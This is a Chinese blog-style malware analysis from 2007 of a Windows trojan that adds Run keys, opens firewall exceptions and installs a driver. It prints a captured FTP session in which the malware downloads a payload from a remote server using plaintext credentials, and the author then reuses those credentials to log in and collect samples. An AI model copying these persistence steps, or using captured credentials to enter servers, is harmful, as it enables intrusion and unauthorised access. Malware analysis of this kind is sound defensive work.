电脑软硬件应用网
当前位置: 电脑软硬件应用网 > 电脑学院 > 网络安全 > 正文
cdnprh.dll,nlfdxfirc.exe,kuyths00.sys,kuyths00.dll等病毒的分析处理
cdnprh.dll,nlfdxfirc.exe,kuyths00.sys,kuyths00.dll等病毒的分析处理
2007-6-14 9:23:13  文/dikex(六…   出处:网友博客   

运行"C:\WINDOWS\system32\Rundll32.exe" "C:\WINDOWS\system32\cdnprh.dll",Start激活病毒后:

注册表改动:

添加:

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\hqghumeay         Type: REG_SZ, Length: 148, Data: "C:\WINDOWS\system32\Rundll32.exe" "C:\WINDOWS\system32\cdnprh.dll",Start
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\"C:\WINDOWS\system32\Rundll32.exe" "C:\WINDOWS\system32\cdnprh.dll",Start         Type: REG_SZ, Length: 204, Data: "C:\WINDOWS\system32\Rundll32.exe" "C:\WINDOWS\system32\cdnprh.dll",Start:*:Enabled:cdnprh.dll",Start
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\"C:\WINDOWS\system32\Rundll32.exe" "C:\WINDOWS\system32\cdnprh.dll",Start         Type: REG_SZ, Length: 204, Data: "C:\WINDOWS\system32\Rundll32.exe" "C:\WINDOWS\system32\cdnprh.dll",Start:*:Enabled:cdnprh.dll",Start
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DoNotAllowExceptions"         Type: REG_DWORD, Length: 4, Data: 0
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile         Type: REG_DWORD, Length: 4, Data: 0

-----------------------------------------------

网络动作:

从网上下载一个exe文件到C:\windows\temp\nlfdxfirc.exe并运行之;

===============================================

nlfdxfirc.exe激活后:

文件改动:

创建:

%Temp%\tmp93.CAB
%Temp%\tmp94.CAB
C:\WINDOWS\system32\kuyths00.dll
C:\WINDOWS\system32\drivers\kuyths00.sys

删除:

%Temp%\tmp93.CAB
%Temp%\tmp94.CAB

-----------------------------------------------

注册表改动:

添加:

HKLM\SYSTEM\ControlSet001\Services\kuyths00         Desired Access: Read/Write
HKLM\SYSTEM\ControlSet001\Services\kuyths00\Type         Type: REG_DWORD, Length: 4, Data: 1
HKLM\SYSTEM\ControlSet001\Services\kuyths00\Start         Type: REG_DWORD, Length: 4, Data: 3
HKLM\SYSTEM\ControlSet001\Services\kuyths00\ErrorControl         Type: REG_DWORD, Length: 4, Data: 1
HKLM\SYSTEM\ControlSet001\Services\kuyths00\ImagePath         Type: REG_EXPAND_SZ, Length: 90, Data: \??\C:\WINDOWS\system32\drivers\kuyths00.sys
HKLM\SYSTEM\ControlSet001\Services\kuyths00\DisplayName         Type: REG_SZ, Length: 18, Data: kuyths00
HKLM\SYSTEM\ControlSet001\Services\kuyths00\Security         Desired Access: Read/Write
HKLM\SYSTEM\ControlSet001\Services\kuyths00\Security\Security         Type: REG_BINARY, Length: 168, Data: 01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_KUYTHS00         Desired Access: All Access
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_KUYTHS00\NextInstance         Type: REG_DWORD, Length: 4, Data: 1
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_KUYTHS00\0000         Desired Access: All Access
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_KUYTHS00\0000\Control         Desired Access: All Access
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_KUYTHS00\0000\Control\*NewlyCreated*         Type: REG_DWORD, Length: 4, Data: 0
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_KUYTHS00\0000\Service         Type: REG_SZ, Length: 18, Data: kuyths00
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_KUYTHS00\0000\Legacy         Type: REG_DWORD, Length: 4, Data: 1
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_KUYTHS00\0000\ConfigFlags         Type: REG_DWORD, Length: 4, Data: 0
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_KUYTHS00\0000\Class         Type: REG_SZ, Length: 26, Data: LegacyDriver
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_KUYTHS00\0000\ClassGUID         Type: REG_SZ, Length: 78, Data: {8ECC055D-047F-11D1-A537-0000F8753ED1}
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_KUYTHS00\0000\DeviceDesc         Type: REG_SZ, Length: 18, Data: kuyths00
HKLM\SYSTEM\ControlSet001\Services\kuyths00\Enum         Desired Access: All Access
HKLM\SYSTEM\ControlSet001\Services\kuyths00\Enum\0         Type: REG_SZ, Length: 52, Data: Root\LEGACY_KUYTHS00\0000
HKLM\SYSTEM\ControlSet001\Services\kuyths00\Enum\Count         Type: REG_DWORD, Length: 4, Data: 1
HKLM\SYSTEM\ControlSet001\Services\kuyths00\Enum\NextInstance         Type: REG_DWORD, Length: 4, Data: 1


-----------------------------------------------

其他:

这时调用cdnprh.dll的rundll32.exe写入了一个注册表信息,也就是昨天的那个乱码情形了:

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\neojdsacml         Type: REG_SZ, Length: 148, Data: #D;]XJOEPXT]tztufn43]Svoemm43/fyf#!#D;]XJOEPXT]tztufn43]deoqsi/emm#-Tubsu

这个东西即使使用icesword查看也是乱码,估计加载时是靠那个驱动翻译为正常的信息;

===============================================

追寻它下载的那个exe文件的地址:

在查看抓的数据包时,没有直接看到exe文件的地址,但发现了下面的几个数据包:


220 Welcome to blah FTP service.

USER netserv3

韝?箹
331 Please specify the password.

PASS 43243wen9874

230 Login successful.

TYPE I

200 Switching to Binary mode.

PASV

200 Switching to Binary mode.


PASV

PASV

227 Entering Passive Mode (60,18,146,34,150,163)

?

?

SIZE /plug/179.exe

SIZE /plug/179.exe

213 19776

RETR /plug/179.exe

150 Opening BINARY mode data connection for /plug/179.exe (19776 bytes).

我靠,是一个FTP站点,而且需要账号和密码,根据数据包信息,打开小车的站点资源探测器,地址为ftp://60.18.146.34/,登陆的用户为netserv3,口令为43243wen9874;

回车,成功登陆上去了!里面有不少文件,打开了plug目录,发现了20个大小相近的exe文件,全部下载下来一看,所有的CRC32校验码都是不同的!又打开了plugback目录,再次发现了20个大小几乎一样的exe文件!据测试是和plug目录里面的一样的;

另外还有一些其他文件,迟些在慢慢研究;

===============================================

随便测试了几个,他们的动作和那个nlfdxfirc.exe如出一辙!用卡巴扫描了一下,一个也不报!看来是高手所为了!我想这个东西可能在未来几天内流行起来!各位警惕一下!

  • 上一篇文章:

  • 下一篇文章:
  • 最新热点 最新推荐 相关文章
    删不掉的"淘宝图标"来侵 教你删"淘宝…
    微软高危漏洞"快捷方式自动执行"手工…
    acad.vlx删除方法
    360se.exe病毒清除解决方案
    regedit32.exe 病毒清除解决方案
    3874jr98.exe,long.exe等病毒清除解…
    RG8.tmp病毒清除解决方案
    139ujf939.exe,2.exe等病毒清除解决…
    EntSoQn.exe病毒清除解决方案
    360safess.net.exe等病毒清除解决方…
    关于45IT | About 45IT | 联系方式 | 版权声明 | 网站导航 |

    Copyright © 2003-2011 45IT. All Rights Reserved 浙ICP备09049068号